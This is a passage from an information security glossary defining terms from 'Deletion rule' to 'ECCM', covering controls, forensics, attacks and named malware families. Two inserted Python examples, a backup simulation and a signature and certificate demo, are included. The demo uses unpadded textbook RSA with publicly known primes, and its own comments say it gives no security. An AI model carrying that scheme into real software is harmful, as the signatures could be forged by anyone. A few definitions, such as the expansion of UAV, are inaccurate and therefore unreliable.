→standard deletion periods and the →regular deletion periods,
which form special groups. However, the term also includes, for instance, the
specific deletion periods for some clusters of PII or deletion periods in
special cases. For details see Clause 7.” (ISO/IEC 27555 draft).
|
Deletion
rule
|
“Combination of deletion
period and specific condition for the starting point of the period run” (ISO/IEC 27555 draft).
|
Demand letter
|
See cease
and desist letter.
|
De-militarized zone
|
See DMZ.
|
DEP
(Data Execution
Prevention)
|
Operating
system security feature intended to prevent pages in memory that
happen to contain executable code from actually being executed unless
they have been explicitly designated executable by clearing the NX (No
eXecute) bit on those pages. Helps prevent buffer overflow and similar attacks.
|
Dependable,
dependability
|
Measure of the extent to which a system, network, person, team, organisation etc.
can be relied upon or trusted
to perform as expected under all anticipated and ideally unanticipated
circumstances. Implies a level of assurance as to the suitability and effectiveness
of its resilience,
recoverability
and contingency
preparations, and clarity of the requirements.
|
Deposition
|
Legal process requiring someone in court under oath to
provide immediate verbal answers to verbal questions. A form of discovery. See
also interrogatory.
|
Deprecated
|
Withdrawn and no longer recommended for use. If
significant flaws
are discovered in cryptosystems,
for instance, the corresponding standards,
algorithms, protocols etc.
are, at some point, removed from service and superseded – hopefully –
by better ones.
|
Derived
measure
|
“Measure that is defined as a function of two or
more values of base measures” (ISO/IEC 15939:2007).
|
DES
(Data Encryption
Standard)
|
Standard
specifying a cryptographic
algorithm (DEA - Data Encryption Algorithm)
for US government use in 1977, published in FIPS PUB 46. Still used by
legacy systems,
albeit normally in the somewhat more secure form of triple-DES. Vulnerable to brute-force attacks with a key length constrained by the standard to
56 bits rather than the maximum of 64, hence DES is deprecated.
|
Design
|
(a) Distinctive physical expression, shape or other
characteristics of a product that is typically associated with a particular brand or trademark. (b)
Systematic process of analysing requirements, then creating and documenting
something to satisfy those requirements. (c) A structured and documented
architecture.
|
Destruct,
destroy
|
Physically
and/or logically obliterate information such that it is no longer recoverable
in usable form, even using forensic techniques. In some
circumstances, the process may further involve erasing any trace of its prior
existence (e.g. deleting associated metadata). “Sanitize using physical
techniques that make recovery infeasible using state of the art laboratory
techniques and results in the subsequent inability to use the media for
storage of data. Note: Disintegrate, incinerate, melt, pulverize, and shred
are destruct forms of sanitization” (ISO/IEC 27040). Note:
“destroy” is the correct English verb form, whereas “destruct” is an
Americanism derived from “destruction”. See also purge.
|
Destruction
|
The act of destroying.
“Result of actions taken to ensure that media cannot be reused as
originally intended and that information is virtually impossible or
prohibitively expensive to recover” (ISO/IEC 27040).
|
Detect
|
“Develop and implement appropriate activities to
identify the occurrence of a cybersecurity event. The Detect Function
enables timely discovery of cybersecurity events.” (NIST
Cybersecurity Framework). A core function within NIST’s
cybersecurity framework along with identify, protect, respond and recover.
|
Detective
control
|
Form of security control intended to detect an incident in
progress, log the
details and/or raise an alert
or alarm to
trigger the appropriate response.
See also preventive
and corrective
control.
|
Deterrent
|
Form of preventive control such as warnings and
penalties intended to deter (that is, reduce the threat of) compromise or attack.
|
Development
environment
|
Computer environment comprising systems, networks, devices, data and supporting processes that are used by software
developers for developing new application
systems. Cf. production
or test
environments.
|
Device
|
An item of computing or networking equipment, a piece of ICT hardware or electronic technology, or
more generally a machine or method
with a specific purpose. Many devices also qualify as things or small systems.
|
Device access control software
|
Program restricting the use of communications ports and/or
equipment (e.g. USB flash memory sticks) on a system. “Software that can be
installed on a system to restrict access to communications ports on
workstations. Device access control software can either block all access to a
communications port or allow access using a whitelisting approach based on
device types, manufacturer’s identification, or even unique device
identifiers” (NZ information Security Manual).
|
DevOps
(Development – Operations integration)
|
Software engineering approach that integrates application development, testing and ICT operations
functions/teams and automates processes, primarily to cut cycle times for software updates
from months to hours. A practical extension of Agile development, a form of RAD, and other continuous development methods. See also DevSecOps.
|
DevSecOps
(Development – Security – Operations
integration)
|
Extension of DevOps
to integrate software development, testing, software/infrastructure security
and ICT operations teams. Extensive process automation speeds things up,
improves repeatability and is well suited to cloud computing (e.g. automatically
provisioning virtual
systems, installing and configuring applications, and validating the installations including
the security aspects).
|
Dexter
|
One of several species
of memory-scraping
Point-of-Sale system malware discovered in the wild in 2012.
|
Dharma
|
One of several species
of ransomware
in the wild in
2019 that strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Targets small organisations,
demanding ransoms
of about $1k.
|
DHS
(Department of Homeland Security)
|
Spooky
US government agency responsible for intelligence and surveillance in support of defense,
counter-terrorism,
critical national
infrastructure protection etc. See also FBI and CIA.
|
Dialler
|
Old-skool form of malware which silently calls a premium
rate phone number on the victim’s
modem, committing toll fraud.
See also war dialler.
|
Dictionary
attack
|
Cryptanalytic
attempt to guess or crack
a password
using words from the dictionary, in various combinations (e.g. forwards,
backwards, with numbers prepended or appended, with punctuation). A more
sophisticated form of brute
force attack.
|
Dieselgate
|
An assurance
and ethics
scandal involving the deliberate programming of VW diesel cars to detect and
respond to emissions testing in progress, cutting exhaust emissions to ace
the test but increasing emissions under normal operating conditions. A sign
of things to come, perhaps, as everyday objects are smartened-up, becoming things capable
of evading dumb checks and controls.
|
Differential backup
|
A backup
of all the files created or changed since the last image backup. In contrast to incremental backups,
a system can be
recovered simply by restoring the most recent image and differential
backups. However, differentials contain more data, hence they take longer to write and
use more storage, than most incrementals.
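The restore difference described above, as an added example that is not part of the glossary: a small simulation in which backups are computed against either the last image (differential) or the previous backup (incremental), including deleted files. All file contents are constructed sample data.

```python
"""Added example (not from the glossary): differential vs incremental backups.

A snapshot is a dict of file name -> content (constructed sample data).
Both backup kinds record files added or changed plus names deleted; the
only difference is the reference state each one is computed against.
"""
from typing import Dict, List, NamedTuple

Snapshot = Dict[str, bytes]


class Backup(NamedTuple):
    changed: Snapshot   # files added or modified since the reference state
    deleted: List[str]  # files removed since the reference state


def changes_since(reference: Snapshot, current: Snapshot) -> Backup:
    """Record what differs between a reference state and the current state."""
    changed = {name: data for name, data in current.items()
               if reference.get(name) != data}
    deleted = sorted(name for name in reference if name not in current)
    return Backup(changed, deleted)


def apply_backup(base: Snapshot, backup: Backup) -> Snapshot:
    """Replay one backup on top of a base state."""
    restored = dict(base)
    restored.update(backup.changed)
    for name in backup.deleted:
        restored.pop(name, None)
    return restored


def size(backup: Backup) -> int:
    """Bytes of file content the backup has to write and store."""
    return sum(len(data) for data in backup.changed.values())


def differential_chain(image: Snapshot, states: List[Snapshot]) -> List[Backup]:
    """Every differential is computed against the last image backup."""
    return [changes_since(image, state) for state in states]


def incremental_chain(image: Snapshot, states: List[Snapshot]) -> List[Backup]:
    """Every incremental is computed against the previous backup's state."""
    chain, previous = [], image
    for state in states:
        chain.append(changes_since(previous, state))
        previous = state
    return chain


def restore_differential(image: Snapshot, chain: List[Backup]) -> Snapshot:
    """Image plus the most recent differential is enough."""
    return apply_backup(image, chain[-1])


def restore_incremental(image: Snapshot, chain: List[Backup]) -> Snapshot:
    """Image plus every incremental, replayed in order."""
    restored = image
    for backup in chain:
        restored = apply_backup(restored, backup)
    return restored


# Constructed sample: a Sunday image backup, then three days of activity.
IMAGE = {"a.txt": b"alpha", "b.txt": b"bravo", "c.txt": b"charlie"}
DAYS = [
    {"a.txt": b"alpha-2", "b.txt": b"bravo", "c.txt": b"charlie"},     # Mon: a edited
    {"a.txt": b"alpha-2", "b.txt": b"bravo-2", "c.txt": b"charlie"},   # Tue: b edited
    {"a.txt": b"alpha-2", "b.txt": b"bravo-2", "d.txt": b"delta"},     # Wed: c deleted, d added
]


if __name__ == "__main__":
    diffs, incs = differential_chain(IMAGE, DAYS), incremental_chain(IMAGE, DAYS)
    print("differential sizes:", [size(b) for b in diffs])  # grow day by day
    print("incremental sizes: ", [size(b) for b in incs])   # stay small
    print("both restore Wednesday:",
          restore_differential(IMAGE, diffs) == DAYS[-1] == restore_incremental(IMAGE, incs))
```

Restoring only the latest incremental on top of the image silently loses Monday's and Tuesday's edits, which is the trade-off the entry describes.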
|
Diffie-Hellman groups
|
“A method used for specifying the modulus size used in
the hashed message authentication code algorithms. Each DH group represents a
specific modulus size. For example, group 2 represents a modulus size of
1024 bits” (NZ information Security Manual).
|
Digest
|
See hash.
|
Digital certificate
|
File containing information about a user or system along with their public key plus
a digital
signature from the Certification
Authority to authenticate
the certificate itself and to some extent (according to the nature and extent
of the checks performed) the user or system to whom it was issued.
|
Digital
device
|
“Electronic equipment used to process or store digital
data” (ISO/IEC
27037).
|
Digital
evidence
|
Forensic
evidence in the form of data
(e.g. the contents of a hard drive, tablet, smartphone or USB memory stick) gathered
in connection with investigating, proving or disproving a crime. “Information
or data, stored or transmitted in binary form, that may be relied on as
evidence” (ISO/IEC
27037).
|
Digital evidence copy
|
In order to guarantee the integrity of digital evidence,
forensic analysis is performed on evidential copies that have been produced
by appropriate methods and can be verified correct. “Copy of the digital
evidence that has been produced to maintain the reliability of the evidence
by including both the digital evidence and verification means where the
method of verifying it can be either embedded in or independent from the
tools used in doing the verification” (ISO/IEC 27037).
|
Digital Evidence
First Responder (DEFR)
|
“Individual who is authorized, trained and qualified to
act first at an incident scene in performing digital evidence collection and
acquisition with the responsibility for handling that evidence. Note:
Authority, training and qualification are the expected requirements necessary
to produce reliable digital evidence, but individual circumstances may result
in an individual not adhering to all three requirements. In this case, the
local law, organisational policy and individual circumstances should be
considered” (ISO/IEC
27037).
|
Digital
Evidence Specialist
(DES)
|
“Individual who can carry out the tasks of a DEFR and has
specialized knowledge, skills and abilities to handle a wide range of
technical issues. Note: A DES may have additional niche skills, for example,
network acquisition, RAM acquisition, Linux or Mainframe knowledge.” (ISO/IEC 27037).
|
Digital
forensics,
cyber forensics,
computer forensics
|
The forensic
analysis of digital
evidence. Strictly speaking, evidence may be obtained from
various devices
and things
besides computers, while computing is usually - but not necessarily -
digital.
|
Digital investigation
|
“Use of scientifically derived and proven methods
towards the identification, collection, transportation, storage, analysis,
interpretation, presentation, distribution, return, and/or destruction of
digital evidence derived from digital sources, while obtaining proper
authorizations for all activities, properly documenting all activities,
interacting with the physical investigation, preserving digital evidence, and
maintaining the chain of custody, for the purpose of facilitating or
furthering the reconstruction of events found to be incidents requiring a
digital investigation, whether of criminal nature or not” (ISO/IEC 27043).
Wow! See also digital
forensics.
|
Digital signature
|
Cryptographic
hash of a message
or file, signed (encrypted) with the sender’s private key and attached to ‘seal’ the
message/file, thus enabling any subsequent changes to be identified and so authenticating
both the message and the sender (giving non-repudiation).
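The mechanism described here and under Digital certificate above, as an added example that is not the glossary’s own code: a SHA-256 digest sealed with a private key, checked with the matching public key, and a minimal certificate in which a CA signs a subject’s public key. It uses textbook RSA built from fixed, publicly known Mersenne primes with no padding scheme, so it demonstrates the mechanism only and offers no real security; the key values, the subject name and the certificate layout are all constructed for the example.

```python
"""Added example (not the glossary's own code): a digital signature over a
SHA-256 digest, and a minimal certificate in which a CA signs a subject's
public key. Textbook RSA with fixed, publicly known Mersenne primes and no
padding: enough to show the mechanism, useless as real security.
"""
import hashlib
import json
from typing import NamedTuple


class KeyPair(NamedTuple):
    n: int  # public modulus
    e: int  # public exponent
    d: int  # private exponent: the only secret part


def make_keypair(p: int, q: int, e: int = 65537) -> KeyPair:
    """Derive an RSA key pair from two primes (constructed inputs below)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return KeyPair(n, e, d)


def digest(data: bytes) -> int:
    """The value that is actually signed: the message's SHA-256 hash."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def sign(key: KeyPair, data: bytes) -> int:
    """Seal the hash with the private exponent; only the key holder can."""
    return pow(digest(data), key.d, key.n)


def verify(n: int, e: int, data: bytes, signature: int) -> bool:
    """Anyone holding the public key recomputes the hash and checks the seal."""
    return pow(signature, e, n) == digest(data)


def canonical(tbs: dict) -> bytes:
    """Deterministic encoding so signer and verifier hash identical bytes."""
    return json.dumps(tbs, sort_keys=True, separators=(",", ":")).encode()


def issue_certificate(ca: KeyPair, subject: str, subject_key: KeyPair) -> dict:
    """The CA vouches for the binding subject <-> public key (private part omitted)."""
    tbs = {"subject": subject, "n": subject_key.n, "e": subject_key.e}
    return {"tbs": tbs, "signature": sign(ca, canonical(tbs))}


def verify_certificate(ca_n: int, ca_e: int, cert: dict) -> bool:
    """Check the CA's seal over the certificate contents."""
    return verify(ca_n, ca_e, canonical(cert["tbs"]), cert["signature"])


def verify_signed_message(ca_n: int, ca_e: int, cert: dict,
                          data: bytes, signature: int) -> bool:
    """Check the chain: CA signature on the cert, then the subject's signature."""
    if not verify_certificate(ca_n, ca_e, cert):
        return False
    return verify(cert["tbs"]["n"], cert["tbs"]["e"], data, signature)


# Constructed keys: 2^521-1, 2^607-1, 2^1279-1 and 2^2203-1 are Mersenne
# primes, but also public, so anyone could recompute d. Illustration only.
SENDER = make_keypair(2**521 - 1, 2**607 - 1)
CA = make_keypair(2**1279 - 1, 2**2203 - 1)


if __name__ == "__main__":
    message = b"Transfer 100 to account 42"
    sig = sign(SENDER, message)
    cert = issue_certificate(CA, "alice@example.test", SENDER)
    print("genuine:", verify_signed_message(CA.n, CA.e, cert, message, sig))
    print("tampered:", verify_signed_message(CA.n, CA.e, cert, message + b"0", sig))
```

Changing one byte of the message, substituting another public key into the certificate, or signing with a key other than the certified one all make the verification fail, which is what the seal is for.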
|
Digital storage medium
|
“Device on which digital data may be recorded” (ISO/IEC 27037,
adapted from ISO/IEC 10027).
|
[Data]
Diode
|
“A device that allows data to flow in only one
direction” (NZ information Security Manual).
|
Dip
|
Momentary/transient reduction in supply voltage, lasting a
few micro- or milliseconds. Most dips pass without incident, but electronic systems with insufficient voltage
regulation may fail. See also brownout,
spike, surge and blackout.
|
Direct
evidence
|
Forensic
evidence that derives from or is closely related to an incident. Cf.
circumstantial
evidence.
|
Disaster
|
A terrible incident
such as a major fire,
flood, fraud or hack. Distinguished
from ordinary events, incidents or crises
by its severity, scale and impact.
|
[IT] Disaster Recovery
(DR)
|
Fallback arrangements to restore IT systems, data and services supporting critical
business functions from backups,
often at an alternative location using cloud-based or mobile IT facilities,
following a major incident
affecting the primary ICT
production
facilities.
|
Disaster Recovery
Plan (DRP)
|
Documentation
of an organisation’s
DR arrangements.
|
Disclaimer
|
Attempt to share
risk by explicitly and expressly denying responsibility for something. Often used
in an attempt to limit legal liabilities. See also notification.
|
Disclosure
|
Revelation of confidential information. May be deliberate or accidental, forced
(e.g. by coercion,
blackmail or social engineering)
or voluntary, whether authorized
and permitted or unauthorized
and forbidden.
See also discovery.
|
Discovery,
disclosure
|
Forensics
term for the enforced
disclosure of
evidence to the
counterparty in an official investigation or court case. A strong reason to
limit the collection and storage of information whose very existence might
prove embarrassing or damaging to the organisation or individuals concerned (e.g. risk assessment
results or audit
recommendations that were not taken seriously). “Process by which each
party obtains information held by another party or non-party concerning a
matter. Note: Discovery is applicable more broadly than to parties in
adversarial disputes. Discovery is also the disclosure of hardcopy documents,
Electronically Stored Information and tangible objects by an adverse party.
In some jurisdictions the term disclosure is used interchangeably with
discovery.” (ISO/IEC
27050-1). See also disclosure, deposition, interrogatory and subpoena.
|
Discretionary
|
Optional i.e. provided, used or configured
according to someone’s discretion, choice or freewill. Usually refers to IT security controls that are
not mandatory.
|
Discretionary Access Control
(DAC)
|
Decisions on whether and how to control access to data can be made by the users of a DAC system using their discretion,
as opposed to being coded irrevocably into a MAC system as an inherent part of its
technical architecture.
|
Discussion
forum, forum,
discussion group, group,
email reflector
|
Social
networking discussion facility. Messages sent to the group by a
member through email
or the website are automatically ‘reflected’ back to all members by email and
(usually) archived on the website allowing them to be searched. Messages
containing sensitive
or inappropriate content (e.g. intended for a specific group
member or someone else entirely) or spam
may be circulated in exactly the same way, while shared information may be exploited by social engineers.
|
Dishonest
|
Someone ‘ethically
challenged’ who lies, deceives,
cheats or defrauds others for
their own benefit. They cannot be relied upon, making them untrustworthy
and probably unworthy of or unsuitable for various privileges and responsibilities.
|
Disinfect
|
Eliminate a malware
infection from a system,
normally by deleting the malicious
software from wherever it is stored and (hopefully!) improving the security controls to prevent
re-infection. “To remove malware from within a file” (NIST SP800-114 rev1).
|
Disinformation
|
See misinformation.
|
Disintegrate
|
Fall to pieces or rip asunder. “Destruct by separating
media into its component parts” (ISO/IEC 27040).
|
Disk
image
|
(a) Copy of the data
on a disk, typically created by an image
backup. (b) In computer
forensics, a bit-copy
of the entire contents of a disk or other storage medium using approved hardware, software and processes. (c) In virtualisation,
a virtual disk made available to a guest operating system by the hypervisor.
|
Disk
mirroring,
RAID
(Redundant Array of
Inexpensive Devices)
|
Technique in which data are simultaneously written to and read from
multiple disks, usually for resilience
and/or performance reasons. Various technical configurations are possible
with different advantages, disadvantages, capabilities and information risks.
|
Disposition
|
Eventual outcome or result of something. “Range of
processes associated with implementing records retention, destruction or
transfer decisions which are documented in disposition authorities or other
instruments” (ISO 30300:2011).
|
Diversity
|
Use of, or at least ready access to, alternative,
independent services, sources, vendors, pieces of equipment, power sources,
communications routes etc. in order to reduce the risk of failure of any one. A resilience control.
Unanticipated dependencies between apparently diverse resources can create single points of failure
and hence additional risks. See also redundancy and mirror site.
|
Division of responsibilities,
separation of duties,
segregation of duties
|
Control
requiring the involvement of more than one individual or organisation
to complete a business process
e.g. a member of staff enters data but someone else, normally a
supervisor or manager,
must review and authorize it for
processing. Normally reinforced by controlled access to the corresponding system functions.
Reduces the possibility of fraud (barring collusion between the individuals, or coercion) and of data entry errors.
“Practice of dividing steps in a function among different individuals so
as to keep a single individual from being able to subvert the process.” (PCI Card Production and Provisioning Physical
Security Requirements, v2.0 January 2017).
|
DLP
(Data Leakage
[or Loss] Prevention)
|
Security technology designed to monitor, identify, log/alert and if appropriate block the inappropriate transfer of confidential information through
a network port or firewall, for
example to prevent workers,
malware or hackers disclosing
or passing personal
information, credit card numbers, trade secrets or other intellectual property to third parties
through the Internet,
whether by accident
or on purpose. Conceptually similar to IDS/IPS but concerns extrusion rather than intrusion.
|
DMCA
(Digital Millennium
Copyright Act)
|
US law prohibiting technologies/devices that may be used to bypass or
defeat software/hardware copy protection
mechanisms.
|
DMZ
(De-Militarized
Zone),
screened subnet
|
Special network
segment
between external
networks such as the
Internet and internal
corporate networks, within which proxy servers and firewalls are intended to identify and
restrict unauthorized
traffic while passing legitimate
traffic. Systems
that need to connect to the Internet (such as Web servers, DNS servers, application servers or front-ends, and email servers) are
typically located in the DMZ, and are hardened. “Perimeter network
(also known as a screened sub-net) inserted as a ‘neutral zone’ between
networks” (ISO/IEC
27033-1). “A small network with one or more servers that
is kept separate from an agency’s core network, either on the outside of the
agency’s firewall, or as a separate network protected by the agency’s
firewall. Demilitarised zones usually provide public domain information to
less trusted networks, such as the Internet” (NZ information Security Manual).
See also zone.
|
DNS
(Domain Name System)
|
Network protocols and systems that let us refer to Internet nodes by memorable domain names (such as Amazon.com) rather than their numeric IP addresses (such as 13.32.145.86).
|
DNSpionage
|
Species of RAT malware in the wild in
2019. Uses DNS tunnelling to communicate with the attacker’s C&C
systems.
|
DNS
[cache] poisoning
|
Attack
that subverts DNS systems or records
to direct victims
covertly to a malicious domain,
phishing or infectious
website etc. instead of the benign
one they anticipated e.g. by ‘poisoning’ cached DNS data with false
linkages or by exploiting
the ‘zone transfer’ process used to pass data between DNS servers. See also pharming.
|
Document,
documented,
documentation
|
Implies that something (such as a policy, process or plan) is sufficiently stable
and understood that it can be written down (‘captured’), and if appropriate
then reviewed and
approved by other stakeholders.
To have any value and avoid becoming shelfware, documents must be accessed, read and
implemented or used, which is where awareness, training, compliance, reinforcement and/or enforcement
activities come into play, along with quality factors such as the reading
level, clarity, interest etc. Changes to important documentation also
need to be managed to ensure it remains aligned with the subject, relevant,
complete and accurate (an integrity
control).
|
Documented information
|
See document.
“Information required to be controlled and maintained by an organisation
and the medium on which it is contained. Notes: documented
information can be in any format and media and from any source; documented
information can refer to the management system, including
related processes, information created in order for the organisation
to operate (documentation), [and/or] evidence of results achieved (records).”
(ISO/IEC 27000).
|
Domain
owner
|
“A domain owner is responsible for the secure
configuration of the security domain throughout its life-cycle, including all
connections to/from the domain” (NZ information Security Manual).
|
Domain
slamming
|
An unethical
and barely legal social
engineering scam
to trick the registered owners
of domains into transferring their registrations to a different fee-charging
registrar, believing they are merely renewing.
|
Domotics
|
Neologism derived from domus (Latin for home)
and robotics or informatics, meaning home automation, IoT and smart homes in
particular.
|
Dongle
|
Copy
protection hardware
device used to
‘unlock’ (i.e. permit
access to and use
of) software on
the particular computer into which it is physically plugged. Also, a hardware
authentication
token. Both forms
normally use cryptography
and tamper
resistance to prevent the devices being illicitly duplicated or
fabricated, but the corresponding applications
may be vulnerable
to hacking,
bypassing or negating the protection.
|
Door
open alarm
|
Physical
security arrangement that monitors an access-controlled door, triggering an alarm if it is opened
(e.g. opening an emergency fire exit may sound the fire alarm to
evacuate the building) or held open much longer than it would take even the slowest
person to pass through (e.g. a card access controlled office door
propped open for some reason may sound an annoying local ‘peeper’ and/or a
silent/remote alarm in the security guard house). Electronic door open
alarms may be manually overridden or silenced for authorized purposes such as office moves
or refits, but such overrides should preferably trigger indicators (such as a
flashing warning light), automated reminders or cancellation/time-outs to
prevent them being forgotten and left in effect beyond the allotted time.
|
Dorkbot
|
Windows malware
in the wild
from 2011 to 2016. RAT
spread via infectious
websites (including Jamie Oliver’s), social networks, IM and USB devices, delivering various payloads including bank Trojans, keyloggers and DDoS engines. The botnet’s command-and-control
structure was disrupted by the authorities with assistance from technology
companies in 2016.
|
DoS
(Denial of Service)
|
Type of information
security incident
in which availability
is impacted, for
example by deliberately or accidentally
overloading the system
or network,
thereby interfering with legitimate
business use. “Prevention of authorized access to a system resource or
the delaying of system operations and functions, with resultant loss of
availability to authorized users” (ISO/IEC 27033-1). See also DDoS and DRDoS.
|
Double
agent
|
An agent
who surreptitiously remains loyal to and acts in the interests of one party
while giving the appearance of loyalty towards another. A form of sabotage or cybertage.
|
Double
extension
|
Operating
systems and applications
often determine a file’s type according to the final extension on its name,
preceded by a period (e.g. files containing executable programs
often end with .exe). Systems may not display the extension for known
file types. Additional periods and characters preceding the final extension
(such as .txt.exe) may be treated as part of the file name. Some malware uses this
and other social
engineering techniques to fool victims, for instance an email might entreat the user to “open the attached text file
containing a disputed invoice”, whereas the attachment is actually a malicious program
that executes when the victim opens it.
|
Double-entry bookkeeping
|
Accountancy process
used since Roman times in which every transaction is recorded as a
complementary pair of credits and debits (equal in value but opposite in
sign) in the relevant accounts. Any discrepancy between the running totals
of the paired accounts when they are reconciled generally indicates a simple data-entry or
calculation error
but could point to fraud
or theft.
|
Downloader
|
Form or component of malware which downloads additional code
(usually the payload)
from the Internet.
This arrangement allows criminals to change the malware dynamically, for
example to evade antivirus
software, attack
specific new targets
or extend previous attacks. See also fileless malware.
|
Downstream
|
“Handling processes and movements of products and
services that occur after an entity in the supply chain takes custody of the
products and responsibility for services” (ISO/IEC 27036-1).
|
Dox, DoX,
doxing, DoXing
|
Leet
terms derived from “docs” (documents),
referring to the process
of illicitly gathering and perhaps disclosing personal information on targets by researching their presence on social media
and other sources such as hacked
personnel databases.
Has harassing,
bullying or threatening
overtones of coercion,
similar to stalking, grooming, snooping,
spying and other
forms of social
engineering.
|
DoXware, doxware
|
See leakware.
|
DP
|
See data
processing.
|
DR
|
See disaster
recovery.
|
Dragonfly
|
See SAE.
|
Draining,
infiltration
|
The ‘urban sport’ of exploring insecure drains, service
ducts and other voids
as a means of bypassing physical
perimeter controls in order
to gain unauthorized
access to sites
and buildings. A risky,
dangerous form of trespass
and a significant though underappreciated risk for many otherwise secure
places.
|
DRDoS
(Distributed Reflective
Denial of Service)
|
Some DDoS
attacks use UDP
rather than TCP, taking advantage of UDP servers (such as DNS servers) to amplify the volume of
traffic, and IP address spoofing
to forward the amplified responses to a victim’s system rather than back to the
originator. It is nothing to do with DR-DOS, a PC operating system from
Digital Research.
|
Dridex,
Bugat,
Cridex
|
A multifunctional evolving antivirus-evading malware with botnet, bank Trojan and ransomware capabilities. The FBI tried to disrupt
the Dridex infrastructure by blackholing
C2
traffic in 2016 but it remained active in the wild in 2019. In December 2019, two
alleged Russian members of Evil Corp (the cybercriminal gang behind Dridex),
were indicted for their part in stealing ~$70m from organisations around the
globe.
|
Drive-by
download,
Web-inject malware
|
Mode of malware
infection
involving the user
merely browsing to an infectious website where vulnerabilities in the browser software are
silently exploited,
usually without the user even being aware of the compromise.
|
Driver
pins
|
In most physical locks, these standard-length metal
cylinders are pushed back against springs into the hull by the variable-length key pins when a key is inserted into
the keyway.
Provided the key pins and driver pins meet along a straight shear line due to
the correct key having been inserted, the plug can be rotated at the shear line to
open or close the lock.
|
DRM
(Digital Rights Management or Digital Restriction
Measures)
|
Cryptographically-based
access controls
used to permit or
deny certain types of use of intellectual
property according to the owner’s
wishes, potentially exceeding the constraints available under copyright law (e.g. fair use can be
prevented through technical means).
|
Drone,
UAV
(Unmanned Autonomous Vehicle)
|
Unmanned aircraft, normally used for remote surveillance.
Basic drones (toys) are controlled by human operators nearby, while
sophisticated military versions (UAVs) may operate semi-autonomously using GPS and intelligent control systems to complete
surveillance or attack
missions across immense distances. Raises safety and privacy concerns.
|
Drop,
dead drop,
Dead Letter
Box
(DLB)
|
Physical or electronic location where messages, parcels,
files etc. may be safely (anonymously, secretly and asynchronously)
delivered to a collector,
competitor, spy
or criminal hacker/cracker. Modern
day spies may use anonymous
Internet
services, encryption,
steganography and covert channels
to pass information
but still rely on dead drops to pass physical assets such as One Time Pads, goods purchased with
stolen credit card numbers, and good ol’ fashioned cash. See also live drop.
|
Dropper
|
Malware which delivers/contains, unpacks
and installs other malware on an infected system.
See also downloader.
|
DROWN
(Decrypting RSA with Obsolete and Weakened
eNcryption)
|
Contrived name for a hack that compromises TLS sessions by exploiting a vulnerability in the deprecated SSL v2 protocol, exposing RSA private keys. See also POODLE and Heartbleed.
|
DTSA
(Defend Trade Secrets Act)
|
US federal law providing some legal protection for confidential proprietary information classed as trade secrets, supplementing state laws and harmonizing the approach.
|
Dual-control
|
Form of control
requiring the actions of more than one person, for example when two soldiers
have to insert and turn their keys
at the same moment into locks
placed several meters apart in order to launch a missile.
|
Dual
stack device
|
“A product that implements both IP version 4 and 6
protocol stacks” (NZ information Security Manual).
|
Dual-use
|
Technology that can be used for both offensive and
defensive security purposes, to wage war and to secure peace. Strong encryption, for
instance, protects information and communications regardless of the nature of
the information and the communicating parties: it is valued and used by
criminals, terrorists, the authorities including governments, militia and law
enforcement,
and the public alike.
|
Due
care
|
Obligation
or expectation that fiduciary
officers/executives
of an organisation
duly protect its
assets and act in
its best interests, just as a prudent person would be expected to do. “The
responsibility that managers and their organisations have a duty to provide
for information security to ensure that the type of control, the cost of
control, and the deployment of control are appropriate for the system being
managed” (NIST
SP 800-30). See also negligence. Cf. due diligence
and duty of care.
|
Due
diligence
|
Assurance
activities in preparation for important corporate activities such as mergers,
acquisitions and the execution
of major contracts.
Also compliance
e.g. enforcing policies
and ensuring that security
controls are effectively protecting valuable information assets.
Cf. due care
and duty of care.
|
Dump
|
Data
file containing authentication
credentials
such as usernames
and passwords
or credit/bank card numbers and related information such as the cardholder’s name
and the CVV,
possibly fullz,
stolen by a hacker
or carder then
made available on the hacker
underground.
|
Duqu
|
APT
worm similar to and
perhaps derived from Stuxnet.
|
Duress
alarm,
duress button
|
Type of silent
alarm that can be triggered by a worker to signal that they are
experiencing some form of duress (coercion, threat, hold-up,
robbery etc.), typically by hitting a concealed ‘panic button’,
releasing a dead man’s handle or entering a particular combination of keys (such as their
normal password
or PIN code
immediately preceded or followed by, say, the hash symbol) into a system that has been
specifically designed
and configured to incorporate this facility (such as a bank teller’s
workstation or security
guard station).
|
Duty
of care
|
A responsibility,
obligation,
duty, requirement or expectation to ensure that others are not harmed by
one’s action or inaction. Cf. due care, due diligence.
|
Dyre
|
A bank
Trojan capable of man-in-the-middle attacks, monitoring online banking sessions to capture
browser snapshots and logon
credentials.
Discovered in 2014.
|
EAL
(Evaluation Assurance Level)
|
An assurance
metric indicating
the depth and rigor to which secure ICT
products are evaluated against the Common Criteria. EAL 1 is the simplest,
most basic level, EAL 7 the most advanced. “Set of assurance requirements
that represent a point on the Common Criteria predefined assurance scale”
(CNSSI-4009).
“A level of assurance in the security functionality of a product gained
from undertaking a Common Criteria evaluation. Each EAL comprises a number
of assurance components, covering aspects of a product’s design, development
and operation” (NZ information Security Manual).
|
EAM
(Enterprise Asset Management)
|
Structured and often software-assisted processes to manage corporate assets (generally
just physical assets such as buildings, machinery/plant, vehicles and
infrastructure) from acquisition to disposal, including preventive
maintenance and repair activities.
|
EAP
(Emergency Action Plan)
|
A plan to help people survive life-threatening emergency
situations or crises such as active shooters, holdups, attacks by terrorists or criminal gangs, bomb
threats or blasts, or natural disasters.
Such events may
occur suddenly without warning, hence the EAP and associated exercises aim to
help by preparing people for the possibility and practicing their responses (e.g. evacuate,
hide or defend yourself).
|
Easter
egg
|
A Trojan
horse function hidden within an otherwise legitimate program. Although normally benign (such as a
simple computer game or audio-visual tribute to the programmers), the fact
that a covert
function has been coded and passed through program testing hints at a
possible governance
issue with the SDLC,
begging the question “What else might be going on in there?”. “Hidden
functionality within an application program, which becomes activated when an
undocumented, and often convoluted, set of commands and keystrokes are
entered. Easter eggs are typically used to display the credits for the
development team and are intended to be nonthreatening” (NIST SP 800-28).
|
Eavesdrop
|
To listen in or snoop on someone or something covertly.
May involve literally listening and watching from nearby, or remotely using surveillance
equipment such as binoculars, bugs,
cameras, spyware,
keyloggers and
backdoors, network analysers,
passive reflectors modulating infrared laser beams, wiretaps etc., with obvious privacy
implications.
|
ECC
(Elliptic Curve Cryptography)
|
Form of public
key encryption
that relies on the unique mathematical properties of elliptic curves to
generate pairs of related keys.
|
ECCM
(Electronic Counter-CounterMeasures),
ECP
(EleCtronic
Protective measures)
|
Defensive
techniques to avoid electronic communications or systems being compromised by an adversary – or indeed by friendly forces
